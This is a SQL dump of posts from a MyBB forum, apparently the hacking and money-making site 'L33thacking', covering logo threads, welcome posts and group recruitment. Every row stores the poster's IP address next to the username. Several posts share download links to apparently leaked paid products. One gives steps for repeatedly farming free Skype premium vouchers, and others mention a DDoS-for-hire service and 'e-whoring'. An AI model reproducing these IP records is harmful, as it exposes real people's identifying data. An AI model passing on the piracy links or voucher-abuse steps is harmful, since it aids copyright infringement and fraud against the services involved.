'0', '0', '0', '1', '4d5d7613bab60f2317edf8ccc9738ada', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6477', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '222', 'Exposé', '1351316191', '[img]http://i.imgur.com/3NVH5.png[/img]', '74.76.76.132', '1246514308', '1', '0', '222', '1351316510', '1', '689c77303e99cf3e3757dad30097e0a3', '0', '1351316510'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6478', '1114', '0', '49', 'AWARDS SUGGETION', '0', '257', 'XxTREYZxX', '1351316244', 'Hey LH, I think it would be cool to have a awards page so you can see what the awards stand for :)', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'd4b226189d41032c6ffe8ebd9431c722', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6479', '1115', '0', '49', 'Update the logo....', '0', '222', 'Exposé', '1351316875', 'I just made this L33thacking halloween logo so Jok3r or NXK should update the logo :D [img]http://i.imgur.com/2drzA.png[/img]', '74.76.76.132', '1246514308', '1', '0', '222', '1351316910', '1', 'a3dba0b33a0eb3d0e376fa2c5aa5b0d8', '0', '1351316910'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6480', '1115', '6479', '49', 'RE: Update the logo....', '0', '295', 'Lollipop123', '1351321583', 'I really like the logo great work expose nice work :P', '203.104.11.7', '-882373881', '0', '0', '0', '0', '1', 'ec04211ae7e7cf9210efbc66cf0d1766', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6481', '1116', '0', '4', 'LOLLIPOP IN THE HOUSE :O', '0', '295', 'Lollipop123', '1351321647', 'Hey guys im new so yeah from lollipop :)', '203.104.11.7', '-882373881', '0', '0', '0', '0', '1', '9c495d277e63fc28f3172bd9a313e5a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6482', '1114', '6478', '49', 'RE: AWARDS SUGGETION', '0', '295', 'Lollipop123', '1351321735', 'This would be cool,even though i got none ahha', '203.104.11.6', '-882373882', '0', '0', '0', '0', '1', '5b6863f9c5d14e02b7ebdbd53c92569b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6483', '1112', '6472', '49', 'RE: SUGGESTION', '0', '295', 'Lollipop123', '1351321849', 'True there is has been no rep fuck so yeah even know im new thats the first thing i checked to see if this is a nice community :P', '203.104.11.4', '-882373884', '0', '0', '0', '0', '1', 'fe8230748c17c76e637a817d23d22141', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6484', '1115', '6479', '49', 'RE: Update the logo....', '0', '222', 'Exposé', '1351322702', 'Come on...I always do my best work :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '116cfab275eccfa8d92ff7d39f17eabc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6485', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '222', 'Exposé', '1351324912', 'Sup lollipop123 and welcome to L33thacking. Please try to be active and post HQ topics :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7ce507fea740bc60e19e3973b2cff1d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6486', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '53', 'sirchamp', '1351329461', '[b]Username:[/b]Sirchamp [b]Age:[/b]Unknown [b]Is your English spelling/grammar good?: [/b]It\'s okay. [b]How many Experience do you have with making money online?:[/b]I have lots of experience with making money online. Cpa, Ebay, GPT, adfoc.us, adf.ly, PPD and e-whoring [b]What for methods do you use?:[/b]Ebay and adfoc.us [b]Do you succeed more than you fail, or not?:[/b]I do. At the moment I make 35 Dollars a day. [b]Explain Why you want to join the group:[/b]I want to learn new methods and I want to share my private methods (e.g adfoc.us) [b]Profile Link:[/b]http://l33thacking.net/user-53.html', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'd1913d932b15bd958db50adad1e696c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6487', '1115', '6479', '49', 'RE: Update the logo....', '0', '228', 'VirtualLegend', '1351334427', 'Looks good, but i doesn\'t match the green theme of LH, so Joker needs to change the green to make it match :P Idk if he want to do that', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1b14c60b8f4f9b3c940fb266708c947a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6488', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '228', 'VirtualLegend', '1351334528', 'Why Lollipop123 and not just Lollipop ? Welcome Bro, Stay active and HQ', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '639faabd9be7305eb382f382dc669aa8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6489', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '228', 'VirtualLegend', '1351334790', 'Welcome Sirchamp to the Marketers !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '3755e8973be8bd0b03bb0df485c4b51c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6490', '1108', '6442', '12', 'RE: How to Crash Small Websites', '0', '228', 'VirtualLegend', '1351334986', 'If you copy it from other websites do it good and with credits. The pictures are broken And plz post some HQ threads, this is really bad Site: http://m14hackersworld.blogspot.nl/2012/09/how-to-crash-small-websites.html#', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '83da53e6b2cb58e5f22304df5e8aa514', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6491', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '53', 'sirchamp', '1351336696', 'I guess you bought time from a booter.. Its not your own booter right? Probobally truboot.', '188.155.56.90', '-1130678182', '1', '0', '53', '1351359387', '1', '55306c49486f2d3a3af04a89b65c0eba', '0', '1351359387'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6492', '1114', '6478', '49', 'RE: AWARDS SUGGETION', '0', '82', 'iTzIpod', '1351337131', 'http://l33thacking.net/misc.php?action=help&hid=12 /Request Close Thread. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c74f7cb29183fb67dcdb2b7d74f3bf95', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6493', '1115', '6479', '49', 'RE: Update the logo....', '0', '257', 'XxTREYZxX', '1351342722', 'Maybe you could make it a autumn colour :P', '122.108.192.197', '2053947589', '1', '0', '0', '0', '1', '1a7f7c007324fddaf29ad9c3d70c28d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6494', '1115', '6479', '49', 'RE: Update the logo....', '0', '222', 'Exposé', '1351346754', 'He doesn\'t need to change anything. It will look fine lol', '66.87.9.104', '1113000296', '1', '0', '0', '0', '1', '1b3b8b29b95cf9e7649becb8e8b5d269', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6495', '1115', '6479', '49', 'RE: Update the logo....', '0', '82', 'iTzIpod', '1351352533', 'It looks fine! :) Good job.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9c6fd2c805410cff9cf24ae733584cb8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6496', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '82', 'iTzIpod', '1351352571', 'I really like it Expose! :) Good job.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f0603cac25af9b343a7fc8b86113fdd5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6497', '1112', '6472', '49', 'RE: SUGGESTION', '0', '82', 'iTzIpod', '1351352624', 'Nice suggestion. But it would be kinda useless right now because rep fucks haven\'t occured yet. Or, not that I know of..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7cb7429d287783e3a99b437bd9969baf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6498', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '82', 'iTzIpod', '1351352664', 'Can I suck on your lollipop? ;) Welcome to L33tHacking dude! :) Enjoy your stay Read the rules and follow them please!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3a1dd7f4dfda468a1e4b9227eef413d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6499', '1117', '0', '82', 'Start Banking $297+ In 24hrs From Now....', '0', '228', 'VirtualLegend', '1351354461', '[align=center][img]http://socialmediadesignkit.com/sl/1.jpg[/img] Sales Page: [code]http://socialmediadesignkit.com/[/code] Download Links: [code]http://uploaded.net/file/9marswox/SMDKa.zip http://uploaded.net/file/ipmslf7q/SMDKb.zip http://uploaded.net/file/cq4lkbgu/A.zip http://uploaded.net/file/3tu8fppf/C.zip http://uploaded.net/file/5hb9y2ad/B.zip http://uploaded.net/file/395w4c10/Fonts.zip[/code][/align]', '83.83.167.183', '1397991351', '1', '0', '228', '1351367816', '1', 'bcb2cb9768f6bc23d1be0a06aa1a4a53', '0', '1351367816'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6500', '1115', '6479', '49', 'RE: Update the logo....', '0', '1', 't3h jok3r', '1351356019', 'I don\'t think the color needs to be changed because the color right now makes it look a bit spooky and it\'s going to stay there for a couple of days only so I think it\'s good. Thanks Expose. Suggestion accepted, do not remove the logo.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9285989cfa09c76fadbd599168ff45c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6501', '1115', '6479', '49', 'RE: Update the logo....', '0', '61', 'NXK', '1351357530', 'It looks the exact same as leak forums logo? :/', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '14ba0c3815dab7d5276e11c3459b0696', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6502', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '61', 'NXK', '1351357779', 'Enjoy it here, I hope you like our community :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '47481575f02163c18592e0a7ed6ebfa8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6503', '1118', '0', '9', '? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1351362966', '[img]http://i.imgur.com/u6W1O.jpg[/img] Thanks to virtuallegend for making the epic threaddesign.', '246.156.113.42', '-157519574', '1', '0', '53', '1351528394', '1', 'a331621fa4af01f93579bba7b85e97fd', '0', '1351528394'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6593', '1135', '0', '4', 'Most Dope General in the building!', '0', '302', 'Mac Miller', '1351529743', '[align=center]Hello guys whats up. My Real name is Chester. I\'m a 16 year old male who likes forums, smoking, and just having fun. I can see ill be active on this forum hopefully i make a name for myself here. If you have questions just ask me and ill answer. Alright Peace! :)[/align]', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '311d7df46a76e4ec7544d79bd8c6aff0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6616', '1135', '6593', '4', 'RE: Most Dope General in the building!', '0', '1', 't3h jok3r', '1351536856', 'Welcome to L33T Hacking. Where did you find LH?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c70fc6bf1c5ce52ac4495cc07eb23c8c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6509', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '82', 'iTzIpod', '1351370835', '@Reloadzor, Yeah ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f974d1f5a112c524013f4e011c6080e0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6510', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '62', 'R?????zo?', '1351371440', 'okay :/ I guess that\'s wierd :P', '94.132.244.168', '1585771688', '1', '0', '62', '1351371457', '1', 'ba21555daf6877f61d3b46563a64264d', '0', '1351371457'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6505', '1115', '6479', '49', 'RE: Update the logo....', '0', '82', 'iTzIpod', '1351366226', 'I looks like LeakForums\'s old Halloween Logo. They changed it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c721ba9f7544626194f47dab9efa0a30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6506', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1351366284', 'Can I have 1 vouch copy please? :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e5b64ee6f8adadb9f29eea33c35db3ad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6507', '1116', '6498', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '62', 'R?????zo?', '1351366684', '[quote=\'iTzIpod\' pid=\'6498\' dateline=\'1351352664\'] Can I suck on your lollipop? ;) [/quote] you sure about that? :o', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3935b983ea54acbf8fd88e4366369fa7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6508', '1119', '0', '82', 'Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]', '0', '228', 'VirtualLegend', '1351368123', '[align=center][size=medium][img]http://www.simplecb.com/images/bundle2.jpg[/img] Sales Page: [code]http://www.simplecb.com/[/code] Download Links: [code]http://d1cezw6wwchlw4.cloudfront.net/SimpleCB/SimpleCBvideos.zip http://d1cezw6wwchlw4.cloudfront.net/SimpleCB/SimpleCBlayouts.zip http://d1cezw6wwchlw4.cloudfront.net/SimpleCB/SimpleCBSalesPage.zip[/code] [quote]Special Credits to Imreport [/quote][/size][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6d22855f839a1d4317d2a43abf21759e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6511', '1119', '6508', '82', 'RE: Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]', '0', '62', 'R?????zo?', '1351371501', 'Looks good, I will check it out. Thanks alot.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd262ce0127eef5cb307a5fa537625268', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6512', '1115', '6479', '49', 'RE: Update the logo....', '0', '222', 'Exposé', '1351379275', 'So we aren\'t changing it. And I don\'t care. Took me like 2 min so it\'s not a big deal. But figured we would get in the festive mood :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7ef91ed596fd5365c2583d4a333c0111', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6513', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '257', 'XxTREYZxX', '1351379984', 'May i please have a vouch copy thanks mate', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '96545d254def0ed6df0127b38817d3df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6514', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1351385563', 'He clearly said he will only give 1... + I got it first. :P', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bde7d741b5cfa521a47a96a775e7a98c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6515', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '1', 't3h jok3r', '1351387123', 'Welcome to L33T Hacking lollipop. Hope you enjoy your stay, where did you find us?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'eca946c424bbc4b7ff17f4af0a5b12b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6516', '1115', '6479', '49', 'RE: Update the logo....', '0', '2', 'Apathy', '1351387672', 'Not bad actually.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '00832d7e934fa8edce3151906abab1fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6517', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '2', 'Apathy', '1351387754', 'Sounds like a nice group. Good luck with it.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '3d729f296f3b00250978ea82bd8f01ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6518', '1119', '6508', '82', 'RE: Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]', '0', '2', 'Apathy', '1351387800', 'Nice I will check this out in a bit.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'ac9dfac318b2a2c66099591ee9951d6c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6519', '1093', '6473', '7', 'RE: I\'m back', '0', '1', 't3h jok3r', '1351390420', '[quote=\'??????????¢™\' pid=\'6473\' dateline=\'1351313219\'] I didnt even notice that he was banned. [/quote] Mods and Staff can only see bans made on site, I can manage bans made by cloudflare.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1c8069c1f862997bfbb0c1df03e2fae8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6520', '1099', '6401', '16', 'RE: Box Method and Drop Explained', '0', '7', 'Romdu62', '1351390508', 'No problem itz, i will try my best', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7114d4742e19e29286bf10e98f203eec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6521', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '7', 'Romdu62', '1351390576', 'lOl my aunt thinks that keeping a easy password is the best thing because then if someone tries to guess then they wont think someone would keep easy password.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e12925a2c951c9838c0675d5961279b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6522', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '7', 'Romdu62', '1351390622', 'No problem guys enjoy and if you guys like my threads then i will do more', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '496daa46f65b925aab901a79579e49ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6523', '1120', '0', '19', '[Junk]HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '7', 'Romdu62', '1351390806', '[size=large][color=#006400]A fellow \'friend\' of mine made this, and he was selling it for 15 bucks.. bullshit. So I thought I could give all you muthafuckin ballers a tutorial that I leaked.[/color][/size] [hide] Requirements: You are going to need about 10 emails. I know, sorry. And your going to need a non-premium skype account. Step 1: Now, your going to need to go to: http://www.freegroupvideocallingskype.com/ (yes, it is actually a legit site) Step 2: For email enter in a REAL email. You won\'t get spam, trust me. Then for skype name, enter in something fake like: leakforums or Friend. Step 3: Do the CAPTCHA and then check your email. You should get a code. Step 4: Go to: https://secure.skype.com/account/voucher/redeem Then type in the code. Step 5: Login into your account on skype and BOOM! You have unlimited premium. NOTES: This premium lasts only 7 days, so just rinse and repeat. [/hide] 